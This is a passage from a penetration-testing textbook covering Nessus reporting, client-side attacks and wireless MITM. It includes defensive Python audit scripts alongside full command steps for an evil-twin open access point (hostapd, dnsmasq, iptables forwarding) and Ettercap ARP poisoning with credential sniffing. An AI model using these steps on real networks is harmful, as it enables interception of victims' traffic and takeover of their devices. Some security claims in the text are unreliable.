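    if _HOSTNAME_RE.match(entry):
        return [entry]
    raise ValueError(f"unrecognised target entry: {entry!r}")


def check_target_list(targets, limit=ESSENTIALS_IP_LIMIT):
    """Expand a comma-separated Targets string.

    Returns (unique_addresses, within_limit). Duplicates are collapsed,
    since a scanner licence counts each distinct address once.
    """
    seen = []
    for entry in targets.split(","):
        for addr in expand_target(entry):
            if addr not in seen:
                seen.append(addr)
    return seen, len(seen) <= limit


if __name__ == "__main__":
    # Constructed input: the book's example plus a small range and a /29.
    sample = "localhost, 10.10.10.10, 10.10.10.1-10.10.10.5, 192.168.56.0/29"
    addresses, ok = check_target_list(sample)
    print(f"{len(addresses)} distinct targets; within Essentials limit: {ok}")
    for addr in addresses:
        print("  ", addr)
```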


6. Give your scan a name, and then click the Save button. The name of this tutorial's scan is
Basic Network Vulnerability Scan, as shown in Figure 6.24:

Figure 6.24: Saving the new Nessus vulnerability scan


Launching a Nessus vulnerability scan 


After saving your scan, an entry for it appears in the My Scans section of the Nessus application.

1. Click the Play button next to the Basic Network Vulnerability Scan to begin your
scan, as shown in Figure 6.25:

Figure 6.25: Playing a Nessus vulnerability scan

2. A rotating green arrow indicator shows that the scan is running. Be patient, as the scan
takes some time to complete, as shown in Figure 6.26:

Figure 6.26: Demonstrating that a rotating green arrow icon indicates a running scan


3. The scan is complete when the rotating green arrow icon turns to a green checkmark. To 
see the results, simply click on the scan’s name! Refer to Figure 6.27: 
Figure 6.27: Completing a vulnerability scan as indicated by the green checkmark


Fantastic work! You have just completed a vulnerability scan on your Kali Linux host! On
the scan summary page, click the Vulnerabilities tab to see the results, as shown in
Figure 6.28:

Figure 6.28: Displaying the found vulnerabilities on the scan summary page


4. Click on one of the vulnerabilities. It will provide additional information, as shown in 
Figure 6.29: 


Figure 6.29: Displaying additional information on the vulnerabilities 


The report explains what the vulnerability is and what it accomplishes. It will offer a solution along
with references to more resources. For the ordinary user, this will provide you with all the
information you need to figure out what is causing the problem, what the risks and threats are,
and how to fix them.


Generating reports


Creating reports will help you organize your work and provide you with a central location to
analyze all your outputs and results during your penetration test. Reports are useful because they
provide all the information in one place, eliminating the need to resort to another document.


1. It is time to get the reports from our scan now that we have installed and executed it. Click
Vulnerabilities, as shown in Figure 6.30:

Figure 6.30: The vulnerabilities

2. Click on Report, as shown in Figure 6.31:

Figure 6.31: Report
3. Select the file format (PDF/HTML/CSV) and select a Report Template, then click on the 
Generate Report button (this will download the file format that you have chosen). 


4. Open the file to see whether it is in a viewable and working format, as shown in Figure
6.32:

Figure 6.32: PDF report


Congratulations, you have successfully generated a vulnerability report in Nessus! 


Resolving vulnerabilities 


Because hackers rarely target software vulnerabilities, they are less harmful than operating
system flaws. Even so, some program flaws, such as those in Internet Explorer or Microsoft
Office, can constitute a significant hazard. As soon as a patch is released, these vulnerabilities
are routinely fixed through Windows updates. Microsoft Update, Windows Update, and Office
Update all provide security upgrades. You can find them simply by searching for "security
update" as a keyword. If Nessus has identified MS07-036 as a vulnerability on your Windows
system, for example, you can search for that security bulletin number and then download all
available updates to patch your machine. When it comes to program vulnerabilities, you should
always check for and download the most recent software upgrades as soon as they become
available.
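The CSV export from the report steps above is the most convenient format for prioritizing the fixes this section describes. The following Python triage script is an added example, not code from the book or from Tenable: it assumes the export carries the default Nessus column headers (Risk, Host, Name, Solution, and so on), and the sample rows, plugin IDs and CVE strings in it are constructed placeholders.

```python
"""Triage a Nessus CSV export: count findings by severity and group the
remediation work by solution.

Added example, not code from the book or from Tenable. It assumes the CSV
uses the default Nessus export headers ("Risk", "Host", "Name", "Solution",
...); the rows below are constructed, with placeholder plugin IDs and CVEs.
"""
import csv
import io

# Nessus risk ratings, most severe first.
SEVERITY_ORDER = ["Critical", "High", "Medium", "Low", "None"]

# Constructed sample export (not real scan output).
SAMPLE_CSV = '''\
"Plugin ID","CVE","CVSS","Risk","Host","Protocol","Port","Name","Synopsis","Description","Solution","See Also","Plugin Output"
"900001","","","None","127.0.0.1","tcp","0","Scan Information","","","n/a","",""
"900002","CVE-0000-0001","7.5","High","10.10.10.10","tcp","22","SSH-1 Protocol Enabled","","","Disable compatibility with version 1 of the protocol.","",""
"900003","","5.8","Medium","10.10.10.10","tcp","23","Telnet Service Without Encryption","","","Disable the Telnet service and use SSH instead.","",""
"900003","","5.8","Medium","10.10.10.11","tcp","23","Telnet Service Without Encryption","","","Disable the Telnet service and use SSH instead.","",""
"900004","","2.6","Low","127.0.0.1","tcp","0","ICMP Timestamp Disclosure","","","Filter out ICMP timestamp requests.","",""
"900005","CVE-0000-0002","9.3","Critical","10.10.10.11","tcp","445","Missing MS07-036 Office Update","","","Apply the MS07-036 security update.","",""
'''


def parse_nessus_csv(text):
    """Return one dict per finding row, keyed by the CSV header names."""
    return list(csv.DictReader(io.StringIO(text)))


def severity_counts(findings):
    """Map each risk rating to the number of findings at that rating."""
    counts = {sev: 0 for sev in SEVERITY_ORDER}
    for f in findings:
        counts[f["Risk"]] = counts.get(f["Risk"], 0) + 1
    return counts


def remediation_plan(findings, minimum="Medium"):
    """Group findings rated `minimum` or worse by their Solution text.

    One patch or configuration change that clears several hosts or plugins
    appears once, ordered most severe first. Returns a list of
    (severity, solution, hosts, plugin_names) tuples.
    """
    cutoff = SEVERITY_ORDER.index(minimum)
    groups = {}
    for f in findings:
        risk = f["Risk"]
        if risk not in SEVERITY_ORDER or SEVERITY_ORDER.index(risk) > cutoff:
            continue
        g = groups.setdefault(f["Solution"], {"sev": risk, "hosts": set(), "names": set()})
        if SEVERITY_ORDER.index(risk) < SEVERITY_ORDER.index(g["sev"]):
            g["sev"] = risk  # a solution inherits the worst finding it fixes
        g["hosts"].add(f["Host"])
        g["names"].add(f["Name"])
    plan = [(g["sev"], sol, sorted(g["hosts"]), sorted(g["names"]))
            for sol, g in groups.items()]
    plan.sort(key=lambda row: (SEVERITY_ORDER.index(row[0]), row[1]))
    return plan


if __name__ == "__main__":
    findings = parse_nessus_csv(SAMPLE_CSV)
    for sev, n in severity_counts(findings).items():
        print(f"{sev:>8}: {n}")
    print()
    for sev, solution, hosts, names in remediation_plan(findings):
        print(f"[{sev}] {solution}")
        print(f"    hosts: {', '.join(hosts)}")
        print(f"    fixes: {', '.join(names)}")
```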


Conclusion 


That is pretty much it for this chapter! We talked about how to start designing an assessment, the 
important components of an assessment, and the assessment’s step-by-step approach. Nessus was 
installed, registered, and plugins were downloaded before Nessus was run. We also built a new 
policy and scan, detected vulnerabilities, read the vulnerability details, and followed up with a 
fix. We will now move on to the next chapter, where you will learn about client-side attacks! 


Questions


1. Mention the steps for installing the Nessus program.
2. What are the differences between a discovery scan and a vulnerability scan?
3. How do you generate a report in the Nessus program?


CHAPTER 7 
Client-side Attacks 


Introduction 


We reviewed how to do a network vulnerability assessment in the previous chapter. Client-side 
assaults will be covered in this chapter, which will help you understand how hackers might target 
and attack systems and other network devices. What is a client-side attack, exactly? Let us 
discuss this. 


Structure 


The following topics will be covered in this chapter: 


• How do client-side attacks work?
• Types of client-side attacks
• Sniffing unencrypted traffic
• Honeypot attacking
• Preventing threats


Objectives 


In this chapter, you will learn how to capture unencrypted traffic and gain an understanding of 
honeypot attacks and methods, Karmetasploit, Jasager, and prevention from threats. 


How do client-side attacks work? 


To completely comprehend how a client-side attack operates, we must first examine how server-
side attacks differ from client-side attacks. Clients connect to servers through a variety of apps
and services, as shown in Figure 7.1. These server services are exposed to every client the server
has made them available to, and an attacker can try to exploit them. A server becomes increasingly
vulnerable to attacks as more services are launched on it:


Figure 7.1: Client-side attacks


Client-side attacks are distinct from server-side attacks. These attacks are designed to exploit
flaws in client apps that interface with a hostile server. Because it does not process anything sent
from a server, the client is not at risk if it is not connected to one. Because most clients are
automatically configured to connect to the server, instant messaging applications can possibly
expose a client to attacks, as shown in Figure 7.2:

Figure 7.2: Client-side attacks scenario_1


The most common client-side attacks are carried out when someone visits a malicious Web page 
that targets their Web browser application. If the attack is successful, the attacker could easily 
take control of the client. There are more attacks than just Web-based attacks, such as attacks via 
e-mail, instant messaging, and FTP, as shown in Figure 7.3: 
Figure 7.3: Client-side attacks scenario_2


Clients are only safeguarded when a defense is provided. Network traffic is restricted by 
firewalls and proxies to only trusted websites and servers. Packet filtering, intrusion prevention 
services, and application control are all included in hardware firewalls like WatchGuard’s XTM 
800 Series. All your systems and devices are at risk if you do not have a hardware firewall on 
your network as a business. 


Types of client-side attacks 


Client-side attacks take advantage of the user’s trust in the website or server they are visiting, as 
shown in Figure 7.4: 


Figure 7.4: Client-side attacks example 


The following are the most typical types of client-side attacks: 


• Spoofing: It is the act of convincing a user that a fraudulent website or server is the real one.

• Cross-site scripting (XSS): This allows an attacker to run code in the user's browser.
This attack can be used to hijack a user's session, launch phishing attacks to steal login
credentials, or even embarrass the user with explicit content. This vulnerability affects all
online apps. An exploit will often execute in the user's Web browser application using
HTML, JavaScript, VBScript, ActiveX, Java, or Flash, as shown in Figure 7.5:

Figure 7.5: XSS Scenario


Sniffing unencrypted traffic 


By now, you should be aware that unencrypted Wi-Fi communication can be accessed by 
anybody, putting your data at risk. Have you ever used a public wireless network, such as one 
provided by Starbucks or a hotel? Have you ever considered who else might be linked to your 
network and listening in on your communications? Is that not terrifying? 


It requires very little to no prior experience! Anyone may view unencrypted traffic with 
surprising ease. In this demonstration, let us see how to sniff your unencrypted communication in 
detail. This presentation will show why it is critical to always connect through a secure 
connection. 


1. Navigate to Applications | Sniffing & Spoofing | Wireshark, as shown in Figure 7.6: 


Figure 7.6: Wireshark application


You can also open Wireshark by entering sudo wireshark in a terminal window. 
2. Figure 7.7 is how the Wireshark graphical interface should look: 
Figure 7.7: Wireshark GUI


3. Then, navigate to Capture | Options..., as shown in Figure 7.8:

Figure 7.8: Wireshark capture interfaces


4. We have chosen eth0 for this demonstration. For some of you, this may be wlan0 or
wlan1. Check the box and click on Start, as shown in Figure 7.9:

Figure 7.9: Wireshark eth0 interface


5. You should see Wireshark beginning to capture network traffic, as shown in Figure 7.10: 
Figure 7.10: Wireshark eth0 interface packets


6. In this demonstration, we will filter for HTTP: enter the filter http and press Enter, as shown in
Figure 7.11:

Figure 7.11: Wireshark HTTP filter


7. Use the HTTP protocol on the browser to log in to the following website: 
http://testphp.vulnweb.com/login.php 
Refer to Figure 7.12: 
Figure 7.12: Website login


To log in, enter username test and password test. 


8. In Wireshark, you should see a lot of different HTTP packets. Right-click on one of them
and select Follow, then TCP Stream, as shown in Figure 7.13:

Figure 7.13: HTTP follow the TCP stream


9. It should display the HTTP request with the username and password in plain text, as
shown in Figure 7.14:

Figure 7.14: HTTP request


You must use the HTTPS protocol to make this connection safe. For other kinds of connection,
such as Telnet, SSH-2 is the only option. SSH-1 has security flaws and is vulnerable to man-in-
the-middle attacks; it is no longer supported and should be avoided at all costs. Make sure
your sshd_config file is up to date, that you have changed the default SSH port, that you have
limited users' SSH access, that you have configured the idle logout timeout interval, that you
have disabled root login, and that you have set a warning banner based on your legal terms and
legal notice details. Passwords and passphrases for SSH should be strong. One cannot emphasize
enough how critical this is.
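The sshd_config hardening items listed above can be checked mechanically rather than by eye. The following Python audit is an added example, not from the book; it parses sshd_config with OpenSSH's first-occurrence rule, ignores settings inside Match blocks, and both configurations embedded in it are constructed.

```python
"""Audit an OpenSSH sshd_config for the hardening items named above.

Added example, not code from the book. Checks: SSH-1 not permitted, a
non-default port, access limited with AllowUsers/AllowGroups, an idle
timeout (ClientAliveInterval), root login disabled, and a legal Banner.
Both configurations below are constructed.
"""
import re

# Constructed: a near-default configuration with SSH-1 and root login left on.
WEAK_CONFIG = """\
# sshd_config (weak, constructed example)
#Port 22
Protocol 2,1
PermitRootLogin yes
#Banner none
"""

# Constructed: the same file after applying the hardening items above.
HARDENED_CONFIG = """\
Port 2222
Protocol 2
AllowUsers kali auditor
ClientAliveInterval 300
ClientAliveCountMax 2
PermitRootLogin no
Banner /etc/issue.net
Match Address 10.0.0.0/8
    Banner none   # conditional override inside a Match block; not global
"""


def parse_sshd_config(text):
    """Return {keyword_lowercase: value} for the global section.

    OpenSSH uses the *first* value it reads for each keyword, so a later
    duplicate is ignored here too. Lines after a Match directive only apply
    conditionally and are skipped.
    """
    settings = {}
    in_match = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and whitespace
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # "Key value" or "Key=value"
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            in_match = True
            continue
        if in_match or key in settings:
            continue
        settings[key] = value
    return settings


def audit_sshd_config(text):
    """Return a list of findings; an empty list means every check passed."""
    cfg = parse_sshd_config(text)
    findings = []
    protocols = [p.strip() for p in cfg.get("protocol", "2").split(",")]
    if "1" in protocols:
        findings.append("Protocol permits SSH-1; set 'Protocol 2'")
    if cfg.get("port", "22") == "22":
        findings.append("Port is the default 22; move sshd to a non-default port")
    if "allowusers" not in cfg and "allowgroups" not in cfg:
        findings.append("No AllowUsers/AllowGroups; SSH access is not limited to specific users")
    if cfg.get("clientaliveinterval", "0") == "0":
        findings.append("ClientAliveInterval unset or 0; idle sessions never time out")
    if cfg.get("permitrootlogin", "prohibit-password").lower() != "no":
        findings.append("PermitRootLogin is not 'no'; direct root login is possible")
    if cfg.get("banner", "none").lower() == "none":
        findings.append("No Banner; the legal warning notice is not displayed")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        problems = audit_sshd_config(text)
        print(f"{label}: {len(problems)} finding(s)")
        for p in problems:
            print("  -", p)
```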


Honeypot attacking 


Wireless networks are becoming significantly larger in terms of bandwidth and range as 
technology advances. A wireless honeypot can be simply set up by a hacker to entice victims 
into what they assume is a secure wireless network. What is a wireless honeypot, and how does it 
work? A wireless honeypot is a device that is set up as an access point that has the same SSID 
as another access point in the area, as well as a proxy set up to point to the attacker’s computer. 


If a user connects to a honeypot, the attacker can filter or monitor all their network activity, 
potentially resulting in a man-in-the-middle attack. Any unencrypted traffic within that 
connection, such as e-mail, instant messaging, FTP, and telnet sessions, would be visible to the 
attacker. Refer to Figure 7.15: 
Figure 7.15: Unencrypted connection 


If the attacker has a high-power gain antenna, the client is more than likely to see the attacker's access point at the top of the list of available wireless networks. Another thing to keep in mind is that most Microsoft Windows operating systems are set up to connect to a wireless network automatically, which might be problematic if a honeypot with an identical SSID and password is nearby. This feature can be turned off. 


Protecting yourself from a honeypot or man-in-the-middle attack 


Simply not using wireless is one of the simplest methods to defend yourself from a honeypot attack, as shown in Figure 7.16. What if your company requires wireless access? Profiles should be created on BYOD devices to allow only trusted wireless networks to connect to the client's devices. Use a 3G/4G or wired connection. What if you still require wireless access? Wireless Intrusion Prevention Systems (WIPS) can detect rogue access points using both software and hardware: 
Figure 7.16: Man in the middle attack 


The SSID, channel, signal strength, and MAC address are used by WIPS to identify these access 
points. There is a probability that the AP is a honeypot if the criteria do not match. What happens 
if the hacker uses the same SSID and channel as you? The signal strength will then be used by 
the WIPS. The signal intensity can help establish whether an AP is real. 
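An added Python example (not from the book) applying those four WIPS criteria to a scan: each observed beacon is compared with an inventory of authorised APs by SSID, BSSID, channel, security mode and, when all of those match, signal strength. The inventory, the beacons and the 15 dBm tolerance are constructed values.

```python
"""Rogue access point check built on the WIPS criteria named above: SSID,
channel, signal strength and MAC address (BSSID).

Added example, not from the book. The authorised-AP inventory, the observed
beacons and the RSSI tolerance are constructed values that a WIPS operator
would replace with their own site survey.
"""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class KnownAP:
    ssid: str
    bssid: str            # MAC address of the authorised AP
    channel: int
    encrypted: bool       # corporate APs run WPA2/WPA3, never open
    baseline_rssi: int    # dBm normally seen by this sensor


@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str
    channel: int
    encrypted: bool       # False when the beacon advertises an open network
    rssi: int             # dBm as received by the sensor


def classify(beacon: Beacon, inventory: List[KnownAP],
             rssi_tolerance: int = 15) -> Tuple[str, str]:
    """Return (verdict, reason) for one beacon.

    Verdicts: "trusted", "rogue" (our SSID from an AP that is not ours),
    "suspect" (everything matches except the signal, which hints at a clone
    on a high-gain antenna) or "unknown" (a neighbour's network, not ours).
    """
    ours = [ap for ap in inventory if ap.ssid == beacon.ssid]
    if not ours:
        return "unknown", "SSID not in inventory"
    match = next((ap for ap in ours if ap.bssid.lower() == beacon.bssid.lower()), None)
    if match is None:
        return "rogue", "our SSID advertised by an unknown BSSID"
    if beacon.channel != match.channel:
        return "rogue", "BSSID cloned but on the wrong channel"
    if beacon.encrypted != match.encrypted:
        return "rogue", "BSSID cloned but security mode differs"
    # SSID, BSSID, channel and security all match: signal strength is what is left.
    if abs(beacon.rssi - match.baseline_rssi) > rssi_tolerance:
        return "suspect", "signal strength far from the sensor baseline"
    return "trusted", "matches inventory"


def scan(beacons: List[Beacon], inventory: List[KnownAP]) -> List[Tuple[str, str, str]]:
    """Classify a whole scan; returns (bssid, verdict, reason) for every non-trusted AP."""
    out = []
    for b in beacons:
        verdict, reason = classify(b, inventory)
        if verdict != "trusted":
            out.append((b.bssid, verdict, reason))
    return out


# Constructed inventory and scan results (all MAC addresses are made up).
INVENTORY = [KnownAP("CorpWiFi", "00:11:22:33:44:55", channel=6,
                     encrypted=True, baseline_rssi=-55)]
OBSERVED = [
    Beacon("CorpWiFi", "00:11:22:33:44:55", 6, True, -57),      # the real AP
    Beacon("CorpWiFi", "02:00:00:AA:BB:CC", 1, False, -40),     # open evil twin
    Beacon("CorpWiFi", "00:11:22:33:44:55", 6, True, -25),      # cloned BSSID, too loud
    Beacon("Free-Wi-Fi", "02:00:00:DD:EE:FF", 11, False, -60),  # not ours: an open network
]

if __name__ == "__main__":
    for bssid, verdict, reason in scan(OBSERVED, INVENTORY):
        print(f"{bssid}: {verdict} ({reason})")
```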


KFSensor is a honeypot intrusion detection system (IDS) for Windows. It works as a honeypot, attracting and detecting hackers, worms, rogues, and flaws. It can deflect attacks by functioning as a decoy, adding an extra layer of defense. The KFSensor interface is shown in Figure 7.17: 
Figure 7.17: KFSensor interface 


You can download a 30-day trial from http://www.keyfocus.net/kfsensor/download/. 


Untrusted Wi-Fi networks, as you may know, can be quite harmful if you join them. If you are in a strange place and happen to be connected to an open network, your data will be visible to the person in charge of the access point, regardless of what device you are using. Not only that, but by hooking you up with a malicious Web page or a backdoor, the person in charge can gain complete control over your device. 


There are numerous ways to accomplish this. You can send the connected user to a malicious website that you control and use it to hook their devices. Using Python MITM scripts on connected devices, you can also run and execute backdoors. Without appearing suspicious, you can even replace the download files that the connected users request on the fly. 


Let us look at how to start a fake AP: 


1. First, we will need to update Linux to the latest version and install the required packages, as shown in Figure 7.18: 
apt-get update 
apt-get install hostapd dnsmasq apache2 


Figure 7.18: Packages installing 


2. We need to put the wireless card in monitor mode to allow us to capture the packets in and around the network. You can use the method shown in Figure 7.19: 
ifconfig wlan0 down 
iwconfig wlan0 mode monitor 
ifconfig wlan0 up 


Figure 7.19: Wireless card settings 


3. Or if that did not work, you can use the method shown in Figure 7.20: 
airmon-ng start wlan0 


Figure 7.20: airmon-ng command 


4. To make things organized and easier to work with, we will make a new directory in root and call it fap, for fake access point. Refer to Figure 7.21: 
mkdir /root/fap 
cd /root/fap 


Figure 7.21: mkdir command 


5. Once we are in the /root/fap directory that we created, we will now set up a new hostapd configuration file and write instructions inside, as shown in Figure 7.22. Hostapd (Host access point daemon) is a software access point that lets the user use his/her wireless adapter to broadcast several access points at the same time. 

nano hostapd.conf 
nano: a command-line text editor included in most Linux installations. 
hostapd.conf: the name of the configuration file that we created. 


Now, inside hostapd.conf, we need to set up the instructions for it: 
interface=wlan0 
driver=nl80211 
ssid=Free-Wi-Fi 
hw_mode=g 
channel=1 
macaddr_acl=0 
ignore_broadcast_ssid=0 


After writing these instructions, press Ctrl + X, then Y, and then Enter. Now, we are all set for hostapd.conf. 

• interface: The name of the wireless adapter that we are using in monitor mode. 

• driver: The supported driver for hostapd. 

• ssid: The broadcasted Wi-Fi name. 

• hw_mode=g: Simply instructs it to use the 2.4 GHz band. 

• channel: The channel number to use for the fake access point. 

• macaddr_acl=0: Tells hostapd not to use MAC filtering. macaddr_acl=1 tells it to use MAC filtering. 

• ignore_broadcast_ssid=0: Makes the fake access point visible and not hidden. 


Refer to Figure 7.22: 


Figure 7.22: Nano command 


6. Start the fake access point by doing: 
hostapd hostapd.conf 


You will notice that our access point will appear as an open Wi-Fi network. Now, open a new terminal window without closing the previous one. In the new terminal window, navigate back to the fap directory by doing the following: 

cd /root/fap 


Refer to Figure 7.23: 


Configuration file: hostapd.conf 
Using interface wlan0 with hwaddr f2:0d:f0:55:ff:56 and ssid "Free-Wi-Fi" 
wlan0: interface state UNINITIALIZED->ENABLED 
wlan0: AP-ENABLED 


Figure 7.23: hostapd command 


7. We will be using dnsmasq for this step. Dnsmasq is a lightweight DNS forwarder and Dynamic Host Configuration Protocol (DHCP) server: it resolves DNS requests from the connected machines and allocates IP addresses to the clients. It is fast and fits our needs well. We will create a configuration file for dnsmasq and put some instructions in it, just like we did previously with hostapd. To create the file: 

nano dnsmasq.conf 


Add these instructions inside: 
interface=wlan0 
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h 
dhcp-option=3,192.168.1.1 
dhcp-option=6,192.168.1.1 
server=8.8.8.8 
log-queries 
log-dhcp 
listen-address=127.0.0.1 


dhcp-range: IP address range for the connected network clients. 12h is the number of hours until the lease expires. 

dhcp-option=3: Gateway IP for the network. 

dhcp-option=6: DNS server, followed by its IP address. 

server: Upstream DNS server's address. 

log-queries: Log the results of DNS queries handled by dnsmasq. 

log-dhcp: Log all the options sent to DHCP clients and the tags used to determine them. 

listen-address: Binds dnsmasq to the local IP address, which is 127.0.0.1. 


Press Ctrl + X, then Y, and then Enter. Now, we are all set for dnsmasq.conf. Refer to Figure 7.24: 


Figure 7.24: Nano dnsmasq.conf command 


8. Now, we need to assign the interface a network gateway and netmask and then add the routing table. Refer to Figure 7.25: 
ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0 
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 


Start the DNS server by doing: 
dnsmasq -C dnsmasq.conf -d 


• dnsmasq -C: Specifies a different configuration file. 

• -d: Runs dnsmasq in the foreground (no-daemon mode), logging to the terminal and keeping the user ID unchanged. 



Figure 7.25: dnsmasq command 


9. To provide the users with internet access, we need to forward traffic from eth0, the virtual wireless adapter that is connected to the internet, to wlan0mon. This will help you perform various attacks that can give you complete access to the user's device. If you do not want the users to have internet access, skip this step. 

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE 

iptables --append FORWARD --in-interface wlan0 -j ACCEPT 


First command: Masquerades (NATs) the traffic leaving through eth0, the interface that traffic is forwarded out from. 

Second command: Accepts packets for forwarding that arrive on wlan0, the interface whose traffic is being forwarded. 


Now, execute this command to enable IP forwarding: 
echo 1 > /proc/sys/net/ipv4/ip_forward 


Refer to Figure 7.26: 




Figure 7.26: iptables command 


10. Test out your fake access point by playing the victim. Connect to your network and access any website you like; you should be able to see all the packets transmitted on the fly in the terminal. Hostapd will show the MAC address as soon as a device has connected to the network. Refer to Figure 7.27: 


Figure 7.27: Fake Wi-Fi 


On the other terminal window where dnsmasq is running, you will find out what the 
device is trying to access in detail. For this example, the user is accessing google.com, as 
shown in Figure 7.28: 




Figure 7.28: Victim is accessing google.com 


This shows how powerful a fake access point can be. Once you get your targets connected, you 
will have many attacks available that could eventually control the user’s device. 


Preventing threats 


So, even if your next hotel stay brings nothing worse than kittens on every redirected Web page, you are now fully aware that it could be dangerous. The good news is that we can still defend ourselves against honeypots and rogue access points. The following are a few of the defenses: 


• Turn off Wi-Fi: The simplest solution to ensure your security is to turn off Wi-Fi. You reduce your exposure to these attacks by not using Wi-Fi. 

• Avoid connecting to open Wi-Fi networks at all costs: Free Internet is appealing, but what if someone is intercepting all network traffic? Do not use open Wi-Fi networks if you do not have to. 

• Always make sure to use HTTPS links, not HTTP: Only download from HTTPS pages. 

• Establish a safe VPN connection: Always use a secure VPN connection if an open network is your only option. 


Conclusion 


This was a fantastic chapter! We went over a lot of stuff. Let us look back at what you have 
learned so far. In this chapter, you learned how to capture unencrypted traffic and learned about 
honeypot attacks and methods, as well as how to use hostapd and dnsmasq to create a fake access 
point and how to protect yourself from threats. 


You will learn how to intercept encrypted network traffic and about man-in-the-middle attacks in 
the upcoming chapter. 


Questions 


1. Mention the client-side attacks. 
2. What is the meaning of honeypot? 
3. How do you create a fake access point in detail? 
4. How do you keep yourself safe from a fake access point? 


CHAPTER 8 
Advanced Wireless Attacks 


Introduction 


As a penetration tester, it is important to know the advanced attacks a hacker can do, even if you 
might not check or demonstrate them during a penetration test. This chapter demonstrates how a 
hacker might launch advanced attacks using wireless access as a starting point. 


In this chapter, we will look at how we can use what we have learned so far to carry out 
advanced attacks. We will concentrate on the man-in-the-middle (MITM) attack, which 
requires a certain level of ability and practice to execute well. Once we have done that, we will 
use this MITM attack as a springboard for more advanced attacks like eavesdropping and session 
hijacking. Then, we will use Metasploit to exploit the victim. Finally, we will list actions to 
prevent these threats. 


Structure 


The following topics will be covered in this chapter: 


• Capturing unencrypted traffic 
• MITM attack 
• Metasploit 
• Preventions 


Objectives 


In this chapter, you will learn how to conduct advanced attacks using wireless, where you will 
create a setup for a MITM attack over wireless and then use it to eavesdrop on the victim’s 
traffic. Then, you will use the same setup to hijack the application layer of the victim (Web 
traffic, to be specific) using a DNS poisoning attack and how to use Metasploit. Finally, you will 
learn how to prevent these threats. 


Capturing unencrypted traffic 


We know that anyone connected to the same wireless network can read unencrypted wireless 
traffic in plain text, as shown in Figure 8.1. Your e-mail, instant messages, FTP files, telnet 
connections, HTTP sessions, and other data may be hacked. What is the mechanism behind this? 
When a user browses a website using HTTP, the data they send is not encrypted from beginning 
to end; thus, it can be intercepted and recorded by anyone on the same network: 


Figure 8.1: Unencrypted connection 


Wireshark is a network analyzer that allows you to examine and save live network packets. 
Wireshark is compatible with Windows, Mac OS X, Linux, and Unix. If a person runs Wireshark 
on a network, they can observe what websites people visit, what files are being moved, what 
instant messages are being sent, and much more. 


There are several network services and public networks that are vulnerable to network sniffing. 
Anyone with the necessary abilities and Wireshark knowledge can quickly breach your accounts. 


Always check the following to keep safe: 


• Use WPA or WPA2 encryption. 
• Always use HTTPS on public networks. 
• Use SSH or encrypted e-mail for file transfers. 
• Use a VPN when on public networks. 
• Use a password manager to log in to websites. 


Man-in-the-middle attacks 


You have probably heard of the monkey in the middle, but what about the man in the center? A man-in-the-middle (MITM) attack occurs when a user's data is intercepted on the network. On the network, a malicious user acts as a router, capturing all network traffic. This covers things such as e-mails, logins, chat messages, and more. Refer to Figure 8.2: 


Figure 8.2: MITM attack 


This demonstration is solely meant to be used as a teaching tool. Hacking to improve security is a valuable talent to have. In most countries, engaging in malicious activity on an unauthorized network without permission is considered a felony. We will use our own computer and network in the next demonstration. 


1. To get started, open a Terminal and type the following, as shown in Figure 8.3: 
mousepad /etc/ettercap/etter.conf 


The Ettercap tool is one of the MITM tools with basic and reliable features: it has a built-in sniffer, supports a DNS spoofing plugin, among others, and supports custom filters. 


Figure 8.3: Open etter.conf file 


2. With etter.conf opened, look for the words highlighted, as shown in Figure 8.4 (the [privs] section, where "nobody is the default"): 


Figure 8.4: etter.conf file 
You will need to replace the highlighted code with the values shown in Figure 8.5 (the ec_gid line): 
Figure 8.5: etter.conf file parameters 


3. Click on Search and then on Find. Type iptables and click on the Find button, as shown in Figure 8.6: 


Figure 8.6: iptables search 


The result should look as shown in Figure 8.7: 


#redir_command_on "iptables -t nat -A PREROUTING 
#redir_command_off "iptables -t nat -D PREROUTING 


Figure 8.7: iptables search results 
You will need to uncomment the two lines to look as shown in Figure 8.8: 


redir_command_on "iptables -t nat -A PREROUTING 
redir_command_off "iptables -t nat -D PREROUTING 


Figure 8.8: iptables uncomment commands 


4. Click on Search and then on Find. Type ip6tables and click on the Find button, as shown in Figure 8.9: 


Figure 8.9: iptables search 


The result should look as shown in Figure 8.10: 


#redir6_command_on "ip6tables -t nat -A PREROUTING 
#redir6_command_off "ip6tables -t nat -D PREROUTING 


Figure 8.10: iptables search results 
You will need to uncomment the two lines to look as shown in Figure 8.11: 


redir6_command_on "ip6tables -t nat -A PREROUTING 
redir6_command_off "ip6tables -t nat -D PREROUTING 


Figure 8.11: iptables uncomment commands 


5. Start Ettercap-gtk by opening a Terminal and typing ettercap -G, as shown in Figure 8.12: 


Figure 8.12: Ettercap GUI 


6. When Ettercap opens, select Sniffing at startup and set Primary Interface to eth0, then press Accept to start Ettercap, as shown in Figure 8.13: 


Figure 8.13: Ettercap select the primary interface 


7. Click on Hosts and then select Scan for hosts, as shown in Figure 8.14: 


Figure 8.14: Scan for hosts 


8. In the command box, you should see hosts added to the host list. Click on Hosts and then select Hosts List, as shown in Figure 8.15: 


Figure 8.15: Hosts list 


9. Select the IP address of the router and then click on the Add to Target 1 button, as shown in Figure 8.16: 


Figure 8.16: Router IP add to Target 1 


10. Select the IP address of the victim and then click on the Add to Target 2 button, as shown in Figure 8.17: 


Figure 8.17: Victim IP add to Target 2 


11. Click on the Mitm menu and then select Arp poisoning, as shown in Figure 8.18: 


Figure 8.18: Mitm Arp poisoning 


12. When you receive a prompt, check the box next to Sniff remote connections and click on OK, as shown in Figure 8.19: 


Figure 8.19: Sniff remote connections 


13. Now, open Wireshark to sniff victim traffic. Then select interface eth0, as shown in Figure 8.20: 


Figure 8.20: Wireshark 


14. After selecting the eth0 interface in Wireshark, apply the http filter, as shown in Figure 8.21: 


Figure 8.21: Wireshark HTTP filter 


15. In the victim machine, open the browser and enter the following URL: http://testphp.vulnweb.com/login.php, as shown in Figure 8.22: 


